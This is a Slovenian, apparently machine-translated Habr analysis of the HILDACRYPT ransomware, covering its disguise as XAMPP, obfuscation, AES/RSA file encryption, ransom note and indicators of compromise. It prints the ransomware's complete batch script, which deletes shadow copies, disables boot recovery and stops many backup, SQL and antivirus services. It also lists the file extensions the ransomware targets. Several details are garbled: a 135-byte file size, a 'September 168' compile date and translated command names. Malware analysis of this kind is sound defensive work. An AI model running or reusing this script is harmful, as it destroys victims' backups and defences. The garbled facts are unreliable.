Pozdravljeni, Habr! Spet govorimo o najnovejših različicah zlonamerne programske opreme iz kategorije Ransomware. HILDACRYPT je nova izsiljevalska programska oprema, članica družine Hilda, odkrita avgusta 2019, poimenovana po risanki Netflix, ki je bila uporabljena za distribucijo programske opreme. Danes se seznanimo s tehničnimi lastnostmi tega posodobljenega virusa izsiljevalske programske opreme.
V prvi različici izsiljevalske programske opreme Hilda je povezava do ene, objavljene na Youtube
Statična analiza
Izsiljevalska programska oprema je v datoteki PE32 .NET, napisani za MS Windows. Njegova velikost je 135 bajtov. Tako glavna programska koda kot programska koda zagovornika sta napisani v C#. Glede na datum kompilacije in časovni žig je bila binarna datoteka ustvarjena 168. septembra 14.
Glede na Detect It Easy se izsiljevalska programska oprema arhivira z uporabo Confuserja in ConfuserExa, vendar sta ta obfuskatorja enaka kot prej, le da je ConfuserEx naslednik Confuserja, zato so njihovi kodni podpisi podobni.
HILDACRYPT je res pakiran s ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor napada
Najverjetneje je bila izsiljevalska programska oprema odkrita na eni izmed spletnih strani za programiranje, zamaskirana kot zakonit program XAMPP.
Celotna veriga okužbe je vidna v
Zamegljenost
Nizi izsiljevalske programske opreme so shranjeni v šifrirani obliki. Ko se zažene, jih HILDACRYPT dešifrira z uporabo Base64 in AES-256-CBC.
Namestitev
Najprej izsiljevalska programska oprema ustvari mapo v %AppDataRoaming%, v kateri se naključno ustvari parameter GUID (Globally Unique Identifier). Če na to mesto dodate datoteko bat, jo izsiljevalski virus zažene s cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & izhod
Nato začne izvajati paketni skript za onemogočanje sistemskih funkcij ali storitev.
Skript vsebuje dolg seznam ukazov, ki uničijo senčne kopije, onemogočijo SQL strežnik, varnostno kopiranje in protivirusne rešitve.
Na primer, neuspešno poskuša zaustaviti storitve Acronis Backup. Poleg tega napada varnostne sisteme in protivirusne rešitve naslednjih proizvajalcev: Veeam, Sophos, Kaspersky, McAfee in drugi.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Ko so storitve in procesi, omenjeni zgoraj, onemogočeni, cryptolocker zbira informacije o vseh tekočih procesih z uporabo ukaza tasklist, da zagotovi, da vse potrebne storitve ne delujejo.
seznam opravil v/fo csv
Ta ukaz prikaže podroben seznam tekočih procesov, katerih elementi so ločeni z znakom »,«.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Po tem preverjanju izsiljevalska programska oprema začne postopek šifriranja.
Šifriranje
Šifriranje datotek
HILDACRYPT pregleduje vso najdeno vsebino trdih diskov, razen map Recycle.Bin in Reference AssembliesMicrosoft. Slednji vsebuje kritične datoteke dll, pdb itd. za aplikacije .Net, ki lahko vplivajo na delovanje izsiljevalske programske opreme. Za iskanje datotek, ki bodo šifrirane, se uporablja naslednji seznam končnic:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Izsiljevalska programska oprema uporablja algoritem AES-256-CBC za šifriranje uporabniških datotek. Velikost ključa je 256 bitov, velikost inicializacijskega vektorja (IV) pa 16 bajtov.
Na naslednjem posnetku zaslona sta bili vrednosti byte_2 in byte_1 pridobljeni naključno z uporabo GetBytes().
Ključ
ВИ
Šifrirana datoteka ima pripono HCY!.. To je primer šifrirane datoteke. Zgoraj omenjeni ključ in IV sta bila ustvarjena za to datoteko.
Šifriranje ključev
Cryptolocker shrani ustvarjeni ključ AES v šifrirano datoteko. Prvi del šifrirane datoteke ima glavo, ki vsebuje podatke, kot so HILDACRYPT, KEY, IV, FileLen v formatu XML, in je videti takole:
Šifriranje s ključi AES in IV poteka z uporabo RSA-2048, kodiranje pa z uporabo Base64. Javni ključ RSA je shranjen v telesu cryptolockerja v enem od šifriranih nizov v formatu XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Javni ključ RSA se uporablja za šifriranje ključa datoteke AES. Javni ključ RSA je kodiran Base64 in je sestavljen iz modula in javnega eksponenta 65537. Za dešifriranje je potreben zasebni ključ RSA, ki ga ima napadalec.
Po šifriranju RSA se ključ AES kodira z uporabo Base64, ki je shranjen v šifrirani datoteki.
Sporočilo o odkupnini
Ko je šifriranje končano, HILDACRYPT zapiše datoteko html v mapo, v kateri je šifriral datoteke. Obvestilo o izsiljevalski programski opremi vsebuje dva e-poštna naslova, kjer lahko žrtev stopi v stik z napadalcem.
Obvestilo o izsiljevanju vsebuje tudi vrstico "Nobena loli ni varna;)" - sklicevanje na like iz animejev in mang z videzom deklic, ki so na Japonskem prepovedane.
Izhod
HILDACRYPT, nova družina izsiljevalskih programov, je izdala novo različico. Model šifriranja žrtvi preprečuje dešifriranje datotek, šifriranih z izsiljevalsko programsko opremo. Cryptolocker uporablja metode aktivne zaščite, da onemogoči zaščitne storitve, povezane s sistemi za varnostno kopiranje in protivirusnimi rešitvami. Avtor HILDACRYPT je oboževalec animirane serije Hilda, predvajane na Netflixu, katere povezava do napovednika je bila v odkupnem pismu za prejšnjo različico programa.
Običajno
Kazalniki kompromisa
Datotečna razširitev HCY!
HILDACRYPTReadMe.html
xamp.exe z eno črko "p" in brez digitalnega podpisa
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vir: www.habr.com